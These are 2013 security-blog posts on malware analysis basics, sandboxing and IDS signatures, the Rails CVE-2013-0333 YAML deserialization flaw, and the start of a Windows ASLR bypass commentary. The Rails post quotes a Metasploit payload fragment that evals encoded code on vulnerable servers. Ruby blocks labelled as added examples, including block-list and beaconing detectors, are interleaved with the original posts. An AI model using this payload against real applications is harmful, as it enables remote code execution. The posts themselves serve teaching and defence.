<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7cWM6MuFaQHrHfswlh5hVBxgvm_DR5HFANLSg46bIZYRg0Qqsygylo3Thg2nnRKdA6O2O2ocz-RvUVJK3OvUJlMgFlUrAJd_k7y8nM0MapA7kKTi7HafnXjSufmMbb18zmKhFulYLTem/s1600/Slide10.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7cWM6MuFaQHrHfswlh5hVBxgvm_DR5HFANLSg46bIZYRg0Qqsygylo3Thg2nnRKdA6O2O2ocz-RvUVJK3OvUJlMgFlUrAJd_k7y8nM0MapA7kKTi7HafnXjSufmMbb18zmKhFulYLTem/s320/Slide10.PNG" height="241" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="https://www.virustotal.com/file/657a66b2709fe3d2cc441be73c9e774ad8a7a73610d8c8d3abb4e60f517a44f8/analysis/">Image Source</a></td></tr>
</tbody></table>
<div>
The image to the right was generated by using VirusTotal's main page to submit a binary retrieved from a domain listed on <a href="http://malwaredomainlist.com/">malwaredomainlist.com</a>. This file is categorized as a generic password stealer, which slots nicely into the "Infostealer" category defined in part 1 of this series. Interesting note: only 9/42 AV products detected this sample as malicious, although the ones that did identify the sample categorized it similarly [this suggests a commonality amongst their signature designs]. The grey window shows PE32 structural information, which is something we will examine a little later. Sites like VirusTotal and antivirus products as a whole are not without their faults: benign files can and oftentimes do trigger alerts [an example being UNetbootin, which is packed with UPX, appears suspicious, and does trigger some alerts]. Thus, relying solely on a multi-scanner service like this is not going to provide enough information to make an informed decision about the overall nature of a sample. Use the information gained from services like VirusTotal or NoVirusThanks to inform your decisions, not to make them for you!</div>
<div>
<br /></div>
<div>
<u>Sandboxing:</u><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKWq3MkgBmlPhNfUCNwKa2YHBV6FrLWQfg8w1pgFfwq2Tj0peQkOtWTZCB00wdoZYO_L3SsV3ijXCOR45AAlkBXNxHgm0pT3OKApmu-lvqKeoKnqt3qtYMBoH9qlBx3MxTP1bCqwqBply/s1600/Slide11.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKWq3MkgBmlPhNfUCNwKa2YHBV6FrLWQfg8w1pgFfwq2Tj0peQkOtWTZCB00wdoZYO_L3SsV3ijXCOR45AAlkBXNxHgm0pT3OKApmu-lvqKeoKnqt3qtYMBoH9qlBx3MxTP1bCqwqBply/s320/Slide11.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.blogcdn.com/downloadsquad.switched.com/media/2009/03/sandbox-asdf-sad-fa-wer-2q3.jpg">Image Source</a></td></tr>
</tbody></table>
<br />
Sandboxing is a basic dynamic analysis technique in which a sample is run in an isolated environment, the goal being to "box off" potentially malicious activity so that it cannot harm the analyst's machine. This is generally achieved through virtualization, e.g. <a href="http://www.cuckoosandbox.org/">Cuckoo Sandbox</a>. Sandboxes attempt to mimic common network services (DNS, HTTP) in order to observe the behavior of malware when it is given apparent network connectivity. Like antivirus services, there are a number of free, web-based services that provide this functionality if one does not have the means to set up a local environment. By far the most popular is <a href="http://threatexpert.com/">ThreatExpert</a>. ThreatExpert performs automated analysis, and is generally very useful in initial reporting.<br />
<br />
Automated sandbox analysis is not without its drawbacks and frequently fails to give any meaningful output. Some of the issues are as follows:<br />
1) Any sample that requires command line options will not be analyzed appropriately, as an automated environment has no way of knowing which arguments to pass when it executes the software.<br />
2) Though network services are simulated, command and control traffic is not. Malware that relies on instructions from a remote host may never execute its real payload, leaving automated analysis useless.<br />
<br />
Provided the sandbox is able to execute the sample, a report containing system changes, network connectivity, and basic functionality is generated. ThreatExpert has the added ability to identify some malware through AV scans, but this functionality overlaps with the services previously mentioned. Like the multi-engine antivirus services, the results of automated analysis should not be taken as definitive: the goal of sandboxing is to provide insight into the ways in which a sample may attempt to manipulate a host.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA8yPJmElwurcs7HfQGuiqQmfmwrJM2JLt5OpYhzOu2F_fvNpFst5O4oVY4LsSyqkhK8qpzvCXgWrcz9bbwBi3Zi_gRa-PQbPUksv2l34V0qe3QLP_ajqC0Nt9XchnAlDgfanVKju_SMMr/s1600/Slide12.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA8yPJmElwurcs7HfQGuiqQmfmwrJM2JLt5OpYhzOu2F_fvNpFst5O4oVY4LsSyqkhK8qpzvCXgWrcz9bbwBi3Zi_gRa-PQbPUksv2l34V0qe3QLP_ajqC0Nt9XchnAlDgfanVKju_SMMr/s320/Slide12.PNG" height="239" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://threatexpert.com/report.aspx?md5=d328f6557605a9290b1d3ffcde38378c">Report Source</a></td></tr>
</tbody></table>
Here is an example report for a sample submitted to ThreatExpert in 2010. Though 2010 may be a relatively ancient date at this point, it is a good demonstration of the information ThreatExpert provides post-analysis. You can see basic summary information about the submitted sample, including hash, file size, aliases as identified by AV products, and the time/date submitted. Of more interest is the "What's Been Found" field, which summarizes the activity that took place during the run in an easily readable and understandable form. This information is very useful for understanding the capabilities of a sample, and can provide some insight into the function calls that you may see further along in the analysis process. The next section contains file system changes: files added, removed and modified, with their names and directories, which is potentially useful for signature development or manual removal. The final section of note is the network activity summary. Here you can see that a file was downloaded, potentially providing yet another sample for analysis in the future. You may also infer that the submitted sample has some downloader Trojan functionality, and is likely making Windows API calls in order to download this file.<br />
<br />
Stay Tuned for Part 3!<br />
[Hashing, PE Headers, Linked Libraries and Functions!]</div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-86934752369736539882013-02-08T05:00:00.001-08:002013-02-08T05:00:23.814-08:00Newest contributor to this blogHello followers. I am a new addition to this blog. My topics will be far and wide, because that is the focus of my interests.<br />
<br />
My current project is porting ArchLinux to my newest embedded device, the oDroid. I have a Raspberry Pi, I wanted something with a bit more processing capabilities and discovered the oDroid. Great device.<br />
<br />
The status of this project is, as far as I can tell the system is running but no video output from the HDMI output (framebuffer only). I have a 1.7v UART adapter on the way so that I can get the console up and figure out the video issue.<br />
<br />
As of last night I've completed setting up a VM on my server that is dedicated to distcc (distributed c compiler) to assist in compiling software on the oDroid. Not that the oDroid is slow but just because time is progress.<br />
<br />
In case you've not seen the oDroid, it packs a Cortex A9 quad-core ARM7 at 1.7GHz, 2 GB of memory and a Mali-400 GPU. A couple of other things that make this stand out compared to the RPi are that this has 6xUSB, audio in, an 8-bit eMMC memory option and then a category 10 SD reader. I did spring for the 16 GB eMMC option.<br />
<br />
I now have the eMMC running Android on it, one SD card with my ArchLinux progress and a second SD card with Ubuntu. I did manage to get GNUradio compiled under Ubuntu and have been using it with a RTL-SDR receiver.<br />
<br />
-MathewUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-61532160061491058882013-02-06T19:03:00.001-08:002013-02-06T21:11:53.732-08:00Malware Analysis 101 [Part 1]<div dir="ltr" style="text-align: left;" trbidi="on">
Back in July of 2012 at the Rhode Island OWASP chapter and again in September of 2012 at "The Brain Tank", I was fortunate enough to be allocated 50 minutes in which to speak about a sort of side hobby that overlaps with my normal workflow. It's a topic that really inspired me to look into the info-sec industry as a career: that topic is malware. I find evil things highly entertaining, and what is more sinister than malicious software?<br />
<br />
The goal of my original presentation was to provide an overview of basic techniques I use on a daily basis in order to inform my decision making process. Within 15 minutes of receiving a sample (regardless of the form it arrives in!) an analyst needs to be able to determine what action to take. The desired outcome is to categorize the sample as:<br />
<div style="text-align: left;">
1) Benign</div>
<div style="text-align: left;">
2) Suspicious</div>
<div style="text-align: left;">
3) Malicious</div>
<div style="text-align: left;">
With that in mind, I am going to go ahead and skip the first 2 slides, which consisted of an Introduction and an About Me section, and hop right into the meat of my presentation. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Note: Some of my slides contain 3rd party graphics or images. These will all be linked below the image of the slide.</div>
<div style="text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div style="text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYLDxB5GNPf2RzMKDBLCcrjBAUfmG1CCrlLQu1CMTzJitQmGMoLxyfEcKllYKEo6ymh0fBcjO3v9Nh4TByBAHb4pJOLcjSBfVUdFUTCF8Zzn94xgLwQa9cOl33mMpWQvSwgAzB_q5F_iNn/s1600/Slide3.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYLDxB5GNPf2RzMKDBLCcrjBAUfmG1CCrlLQu1CMTzJitQmGMoLxyfEcKllYKEo6ymh0fBcjO3v9Nh4TByBAHb4pJOLcjSBfVUdFUTCF8Zzn94xgLwQa9cOl33mMpWQvSwgAzB_q5F_iNn/s320/Slide3.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.versuscyberpunkhorrors.com/2012/04/digital-fears-of-new-world.html">Image Source</a></td></tr>
</tbody></table>
<u>Types of Malware:</u><br />
<br />
Subdividing the different "species" of malware is a fairly difficult task, as a significant number of samples exhibit a large range of capabilities. With that in mind, a generic outline can be presented as follows:<br />
<br />
<ul style="text-align: left;">
<li>Backdoor - Installed onto a host to allow access. Usually, an attacker can connect with little to no authentication to an environment in which he or she may execute commands.</li>
<li>Botnet - Similar to a backdoor, however each machine infected with the same malware receives the same set of instructions from a command and control server (C2).</li>
<li>Downloader - Code that allows the download of additional malicious code. Generally a "gateway" type of malware installed after an attacker first gains access. This behavior is often observed in Exploit Kits (Exploit -> Downloader Trojan -> Trojan retrieves botnet or Infostealer Payload).</li>
<li>Rootkit/Bootkit - Conceals the existence of itself and other malicious code in an attempt to provide some resiliency and persistence. Generally malware in this category spans into backdoor functionality.</li>
<li>Worm/Virus - Malicious code that can copy itself and propagate. In ye olde times this was used for DoS/notoriety. Current functionality appears to be financially motivated; worms are often used to gain access to machines that are then used to send spam.</li>
<li>Infostealer [Trojan] - Collects information and exfiltrates it. Usually includes sniffers, hash collection, and keyloggers. A prominent example is the Zeus family of malware. </li>
</ul>
<div>
These categories are NOT mutually exclusive!</div>
<div>
<br /></div>
<div>
<u>Modern Malware:</u></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeP6gwKEiHJ5CtjFDokkJhl5ZIT2BDLxwVnfdNEPJQhwpkte4TlM3_gu6MFNCYal_Gju24eQULRFPTWr6jaaVePtWQyvaaAYrdBfFHnXlMiWQU1ZoyFtmeFZzRRkW25IRh7maF-BUatuL/s1600/Slide5.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeP6gwKEiHJ5CtjFDokkJhl5ZIT2BDLxwVnfdNEPJQhwpkte4TlM3_gu6MFNCYal_Gju24eQULRFPTWr6jaaVePtWQyvaaAYrdBfFHnXlMiWQU1ZoyFtmeFZzRRkW25IRh7maF-BUatuL/s320/Slide5.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://t0.gstatic.com/images?q=tbn:ANd9GcTD2e2taiseudobJINjUkBpNxrNdPFCrH-3zLRUqr50jw05XxJWyJcmGUB7">Image Source</a></td></tr>
</tbody></table>
<div>
<br /></div>
<br />
Malicious software is the primary vector for the majority of intrusions. It is easiest to break down the "styles" of attacks into two categories:<br />
<br />
<ol style="text-align: left;">
<li>Targeted - The result of social engineering techniques like spear phishing. This is the "precision strike" approach.</li>
<li>Untargeted - This is commonly described as drive-by exploitation, as observed in Exploit Kits. This is the "shotgun" approach.</li>
</ol>
<div>
A key part of modern malware (actually, what makes it modern) is the inclusion of network communication components. In olden times, malware did not always utilize a host's internet connectivity to receive commands or update; this provided for autonomous, but dumb, software. Nowadays, it is exceedingly common for malicious software to include some type of network functionality. Malware authors have incorporated a number of techniques for communication ranging from the basic (HTTP GET/POST requests over plain text) to the advanced (Custom binary protocols with encryption). No matter the technique used, the general functionality remains the same: network connectivity allows for data exfiltration, remote command execution, and updating of core malware components.</div>
<div>
<br /></div>
<div>
<u>Network Detection:</u></div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzn0KUB2REhOnRsfNrFj0SLB3yF9AgqhJE1WDk4yD2Dcx04uOdjwQT4XSMxHJfmHWfCuQDtAf2TOT7c092ZsyDJch1vuTuXtRLtcW8TfwaJrAC5ezL7sZYWM3hG5k96cF02A459ofQnFVk/s1600/Slide6.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzn0KUB2REhOnRsfNrFj0SLB3yF9AgqhJE1WDk4yD2Dcx04uOdjwQT4XSMxHJfmHWfCuQDtAf2TOT7c092ZsyDJch1vuTuXtRLtcW8TfwaJrAC5ezL7sZYWM3hG5k96cF02A459ofQnFVk/s320/Slide6.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.ma-tech.co.uk/images/Virus-Detected.jpg">Image Source</a></td></tr>
</tbody></table>
<div>
With the rise of network-connected malware, IDS/IPS platforms have become a popular solution for detecting threats. These devices, however, are not without their limits. Some of the pitfalls of IDS/IPS devices are:</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>Analysis of traffic in context is extremely difficult to automate. Protocols, and the formatting within protocols, make the context of traffic of paramount importance. For example, it is common to see IP -&gt; TCP -&gt; HTTP -&gt; GZIP -&gt; JavaScript in the same stream. If the IDS/IPS is unable to decompress the GZIP layer and examine the JavaScript, it could miss potentially malicious payloads. The good news is that this is a well-known shortcoming of this type of technology and developers are constantly adding features to make their platforms increasingly protocol aware.</li>
<li>Related to the issue of contextual analysis, without stream reassembly an IDS/IPS makes decisions one packet at a time. Evasion/insertion techniques, fragmentation, or malformed packets can then cause the sensor to see something different from what the endpoint sees, with unintended results.</li>
</ul>
<div>
The introduction of target-based analysis (Snort's Frag3 Preprocessor) allows the IDS/IPS to "know" how devices will handle ambiguity. Though this is a step in the right direction, human analysis is still required to compensate for the shortcomings of this technology. Unusual or one-off scenarios can still confuse IDS/IPS. </div>
</div>
<div>
<br /></div>
<div>
IDS have come a long way since their days of "Network Grep", but they are certainly not foolproof.</div>
<div>
<br /></div>
<div>
<u>Signature Types:</u></div>
<div>
<u><br /></u></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlGxiGzh6ySzDPLHG1yiW2QeF0QfOpvkSd-rgL0PRhXkw1IvFtmHNB_g6Nz2246bYOiqEAwGw-SAGlheAk8wPxpOSEeUWyIJ5JPvy-WFZ73kwxhun9yfwJC0kzdZPyBjFMXyuFgT4Lar3/s1600/Slide7.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlGxiGzh6ySzDPLHG1yiW2QeF0QfOpvkSd-rgL0PRhXkw1IvFtmHNB_g6Nz2246bYOiqEAwGw-SAGlheAk8wPxpOSEeUWyIJ5JPvy-WFZ73kwxhun9yfwJC0kzdZPyBjFMXyuFgT4Lar3/s320/Slide7.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<div>
Several types of signatures are used by IDS/IPS platforms to detect the activity of malicious software.</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>Phoning Home - The goal of these signatures is to detect outbound connection attempts to a malicious host. This is occasionally done by inference: "Oh hey, this internal host is making tons of HTTP POST requests to a host in Kazakhstan. That probably isn't suspicious." Other signatures in this category focus on the specific formatting of requests. A recent example is the Redkit Exploit Kit utilizing a predictable .jar file name. This isn't foolproof, as services like Twitter/Facebook/Google have been used to mask command and control communications within benign websites.</li>
<li>Third-Party communications - Malware may not necessarily check in with a C2 first. In the case of several versions of the "ZeroAccess" Trojan, the legitimate host "fling(dot)com" is queried in an attempt to geo-locate the IP of the infected host. This can be an early indicator of a compromised machine.</li>
<li>Inference - Like the name suggests, this type of signature is essentially "reading into" traffic and making a decision. This is commonly implemented in the form of DNS lookups for malicious domains. This traffic may be from a local host to an internal DNS server, however the domain being requested has been identified as malicious and thus results in an alert. Another example is the TDL3/4 class of Trojans which have consistently identifiable certificate exchanges.</li>
</ol>
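<div>
To make the three signature types concrete, here is an added example (mine, not the post's, and not Snort rules) that runs each of them over a handful of constructed log records: a DNS block-list check (the "inference" type, where the lookup to the internal resolver is ordinary and only the name is telling), a check for contact with a benign third-party host that a family is known to touch before its C2 (the ZeroAccess/fling.com case above would go into that list; the placeholder host here is constructed), and a phone-home detector that infers beaconing from repeated POSTs by one inside host to one outside host within a short window. All hostnames, addresses, the log format and the thresholds are constructed.</div>

```ruby
require 'time'

# Added example, not from the post. All names, addresses and thresholds are
# constructed; the .invalid domains are placeholders.
DNS_BLOCKLIST = %w[evil-updates.invalid].freeze
CHECKIN_HOSTS = %w[geoip-lookup.invalid].freeze   # benign host a family touches before its C2
INTERNAL_NET  = /\A10\./                           # treat 10/8 as "inside"

# Constructed records, one per line:
#   <time> dns  <src> -> <resolver> query <name>
#   <time> http <src> -> <dst> <verb> <path> host=<name>
SAMPLE_LOG = <<~LOG
  2013-02-06T19:00:01Z dns  10.0.0.5 -> 10.0.0.2 query evil-updates.invalid
  2013-02-06T19:00:02Z http 10.0.0.5 -> 203.0.113.10 POST /gate.php host=evil-updates.invalid
  2013-02-06T19:00:12Z http 10.0.0.5 -> 203.0.113.10 POST /gate.php host=evil-updates.invalid
  2013-02-06T19:00:22Z http 10.0.0.5 -> 203.0.113.10 POST /gate.php host=evil-updates.invalid
  2013-02-06T19:00:32Z http 10.0.0.5 -> 203.0.113.10 POST /gate.php host=evil-updates.invalid
  2013-02-06T19:01:05Z dns  10.0.0.7 -> 10.0.0.2 query geoip-lookup.invalid
  2013-02-06T19:01:06Z http 10.0.0.7 -> 198.51.100.9 GET /ip.php host=geoip-lookup.invalid
  2013-02-06T19:02:00Z http 10.0.0.9 -> 198.51.100.20 GET /index.html host=news.example
  2013-02-06T19:02:30Z http 10.0.0.9 -> 198.51.100.20 POST /login host=news.example
LOG

Record  = Struct.new(:time, :kind, :src, :dst, :verb, :path, :host, :qname)
LINE_RE = /\A(\S+)\s+(dns|http)\s+(\S+) -> (\S+)\s+(.*)\z/

def parse_line(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  time, kind, src, dst, rest = m.captures
  rec = Record.new(Time.iso8601(time), kind, src, dst)
  if kind == "dns"
    rec.qname = rest[/\Aquery (\S+)/, 1]
  else
    rec.verb, rec.path, host = rest.split(" ", 3)
    rec.host = host.to_s.sub(/\Ahost=/, "")
  end
  rec
end

def parse_log(text)
  text.each_line.map { |l| parse_line(l) }.compact
end

# Signature type 3, inference: the query itself is ordinary traffic to the
# internal resolver; only the name being asked for is the indicator.
def dns_blocklist_hits(records)
  records.select { |r| r.kind == "dns" && DNS_BLOCKLIST.include?(r.qname) }
         .map { |r| { type: :dns_blocklist, src: r.src, detail: r.qname } }
end

# Signature type 2: contact with a legitimate third party that a known family
# uses (e.g. to geolocate itself) before it ever talks to its C2.
def third_party_checkins(records)
  records.select { |r| r.kind == "http" && CHECKIN_HOSTS.include?(r.host) }
         .map { |r| { type: :third_party_checkin, src: r.src, detail: r.host } }
end

# Signature type 1, phoning home by inference: an inside host POSTing to the
# same outside host at least min_posts times within `window` seconds.
def post_beacons(records, min_posts: 4, window: 60)
  posts = records.select { |r| r.kind == "http" && r.verb == "POST" && r.src =~ INTERNAL_NET }
  posts.group_by { |r| [r.src, r.dst] }.map do |(src, dst), group|
    times = group.map(&:time).sort
    # slide over the sorted timestamps looking for min_posts inside one window
    hit = (0..times.size - min_posts).any? { |i| times[i + min_posts - 1] - times[i] <= window }
    { type: :post_beacon, src: src, detail: "#{group.size} POSTs to #{dst}" } if hit
  end.compact
end

def detect(text)
  records = parse_log(text)
  dns_blocklist_hits(records) + third_party_checkins(records) + post_beacons(records)
end

detect(SAMPLE_LOG).each { |a| puts a.inspect } if __FILE__ == $0
```

<div>
Only the beacon detector carries the false-positive risk the post warns about: a user submitting a long web form will also POST repeatedly to one host, so in practice the threshold, the window and an allow list of known-good destinations are what separate a usable alert from noise. The other two are exact matches and are only as good as the lists behind them.</div>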
<div>
Stay tuned for Part 2: Approaches to Analysis!</div>
</div>
<div>
<u><br /></u></div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com2tag:blogger.com,1999:blog-5498034097070054412.post-75478870191178009702013-01-28T14:27:00.002-08:002013-01-29T23:30:27.417-08:00CVE-2013-0333 - Ruby On Rails: JSON Parser Derailed<div dir="ltr" style="text-align: left;" trbidi="on">
Yet another Ruby on Rails vulnerability has been patched today.<br />
Official(ish) notification here: <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo">Google Groups: Ruby on Rails Security</a><br />
<br />
This time, instead of XML being used to pass raw POST data as an argument to the backend, the problem lies in the JSON parser (JSON input was originally considered the workaround for CVE-2013-0156), which transforms JSON into YAML that is in turn passed through a YAML parser. This leads to a very similar attack, abusing<span style="color: lime;"> </span><span style="color: lime; font-family: Consolas, Liberation Mono, Courier, monospace;"><span style="font-size: 12px; line-height: 16px; white-space: pre;">!ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection</span></span>, which was previously thought patched in Rails 2.3.x and 3.0.x.<br />
<br />
Here's a look at the problem (<span style="color: lime;">activesupport/lib/active_support/json/backends/yaml.rb</span>)<br />
<br />
<br />
<blockquote class="tr_bq">
# Parses a JSON string or IO and converts it into an object<br />
def decode(json)<br />
&nbsp;&nbsp;if json.respond_to?(:read)<br />
&nbsp;&nbsp;&nbsp;&nbsp;json = json.read<br />
&nbsp;&nbsp;end<br />
&nbsp;&nbsp;<b>YAML.load(convert_json_to_yaml(json))</b><br />
rescue *EXCEPTIONS => e<br />
&nbsp;&nbsp;raise ParseError, "Invalid JSON string: '%s'" % json<br />
end</blockquote>
<br />
<br />
The bold part is important. <span style="color: lime;">convert_json_to_yaml</span> rewrites arbitrary user input into YAML, and the YAML parser then deserializes it, so the full YAML type system is in play: serialization and deserialization of arbitrary data types, which once again includes reserved Ruby symbols and arbitrary objects. However, instead of a combination of XML and YAML, JSON converted into YAML is the culprit.<br />
<br />
The fix replaces the YAML backend (<span style="color: lime;">activesupport/lib/active_support/json/backends/yaml.rb</span>), which among other things accepted single-quoted ('foo') strings that are not valid JSON, with OkJson (<span style="color: lime;">activesupport/lib/active_support/json/backends/okjson.rb</span>). The fixed versions are 3.0.20 and 2.3.16. Due to the similarity to the previous vulnerabilities earlier this month, this is likely to be utilized in the wild quickly. Expect probes soon.<br />
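<div>
Added example, not Rails code: the two decode paths side by side. <span style="color: lime;">decode_via_yaml</span> stands in for the vulnerable backend's final step, a full YAML load of attacker-controlled text (Psych 4 and later made <span style="color: lime;">YAML.load</span> the safe variant, so the example calls <span style="color: lime;">unsafe_load</span> where it exists to reproduce the 2013 behaviour); <span style="color: lime;">decode_via_json</span> is what a strict JSON parser such as OkJson gives you, using the standard library's JSON here; <span style="color: lime;">decode_via_safe_yaml</span> shows the alternative if YAML really is the wire format. <span style="color: lime;">AuditNote</span> is a constructed application class and the payload is constructed; this is a harmless object instantiation, not the RCE chain from the PoC.</div>

```ruby
require 'yaml'
require 'json'

# Constructed stand-in for an application class that request data should
# never be able to instantiate.
class AuditNote
  attr_accessor :text
end

# Stand-in for the vulnerable path: whatever the client sent ends up in a full
# YAML load, which honours !ruby/object and !ruby/hash tags. Psych 4 made
# YAML.load safe by default, so use unsafe_load where it exists to get the
# behaviour the pre-3.0.20 backend had.
def decode_via_yaml(body)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(body) : YAML.load(body)
end

# What the fix amounts to: a strict JSON parser has no object tags at all, so
# the same body is simply a parse error.
def decode_via_json(body)
  JSON.parse(body)
end

# If YAML must be accepted, the safe loader refuses anything but basic types.
def decode_via_safe_yaml(body)
  YAML.safe_load(body)
end

# Constructed payload: valid YAML carrying an object tag, not valid JSON.
PAYLOAD = "--- !ruby/object:AuditNote\ntext: injected\n".freeze

# Returns [object built by the unsafe path, error class from JSON.parse,
# error class from YAML.safe_load] for the same body.
def compare(body)
  unsafe   = decode_via_yaml(body)
  json_err = begin
    decode_via_json(body)
    nil
  rescue JSON::ParserError => e
    e.class
  end
  yaml_err = begin
    decode_via_safe_yaml(body)
    nil
  rescue Psych::DisallowedClass => e
    e.class
  end
  [unsafe, json_err, yaml_err]
end

if __FILE__ == $0
  obj, json_err, yaml_err = compare(PAYLOAD)
  puts "unsafe path built a #{obj.class} with text=#{obj.text.inspect}"
  puts "JSON.parse: #{json_err}; YAML.safe_load: #{yaml_err}"
end
```

<div>
The point is the class of the object that comes back: the unsafe path hands the application an instance of whatever class the attacker named, with instance variables of the attacker's choosing, which is exactly the primitive the NamedRouteCollection trick builds on. Both safe paths fail closed on the same bytes.</div>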
<br />
Update 1: POC here: <a href="https://gist.github.com/4660248">https://gist.github.com/4660248</a><br />
<br />
<blockquote class="tr_bq">
<span style="color: lime;">encoded_yaml = yaml.gsub(':','\u003a') </span></blockquote>
[Clever!]<br />
<br />
Update 2: Sample of Metasploit Module Code, based on the previous XML/YAML Vuln<br />
<br />
<blockquote class="tr_bq">
yaml = "!ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +<br />
&nbsp;&nbsp;"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +<br />
&nbsp;&nbsp;"eval(%[#{code}].unpack(%[m0])[0]);' " +<br />
&nbsp;&nbsp;": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"<br />
encoded_yaml = yaml.gsub(':','\u003a')</blockquote>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-71654717239398356362013-01-26T15:03:00.000-08:002013-01-26T17:36:11.132-08:00Windows 7/8 ASLR - Not so Much<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This commentary is based on the work published and performed by "Kingcope". The original text and PoCs are located here: <a href="http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/">http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/</a><br />
<br />
The inclusion of memory protections in Windows 7 (and now Windows 8) was touted as a means to defeat exploitation attempts by:<br />
<br />
1) Preventing code execution on the stack [<a href="http://en.wikipedia.org/wiki/Data_Execution_Prevention">DEP</a>]<br />
2) Randomizing the memory offsets of Programs (and associated DLLs) [<a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a>].<br />
<br />
While bypassing DEP has been relatively well documented by multiple sources in numerous locations [see: <a href="https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/">ROP Chains</a>], ASLR has proven a tougher nut to crack. Randomizing the memory layout forces an exploit writer to predict where in memory to point an instruction pointer that he or she has gained control over, the goal being, of course, to point it at an area of memory that contains the writer's arbitrary code.<br />
<br />
Current methods for "beating" ASLR include utilizing browser memory leak bugs or relying on older DLLs that do not have their image bases randomized. Unfortunately, knowledge of a particular memory leak or reliance on outdated third-party software are niche* scenarios, and it is only when they line up that an ideal attack surface results.<br />
<br />
That's where Kingcope's research comes in!<br />
<br />
The theory presented is fairly simple: DLLs are loaded into memory wherever there is space available. If no memory (or very little) is available, the DLL will be put into whatever memory remains. But how does an attacker create a situation in which there is no or minimal (and thus predictable!) memory available in which to load a DLL? By utilizing JavaScript in a target's browser to fill memory up to the allocation boundary.** When that boundary is hit, a JavaScript exception is raised, and the exception handler executes additional code that frees small chunks of memory. The goal is to slowly free small heap blocks while trying to load the DLL(s); once the DLL is successfully loaded, its region (address space) is fixed and predictable, allowing an exploit writer to point an instruction pointer at a fixed location on the heap.<br />
<br />
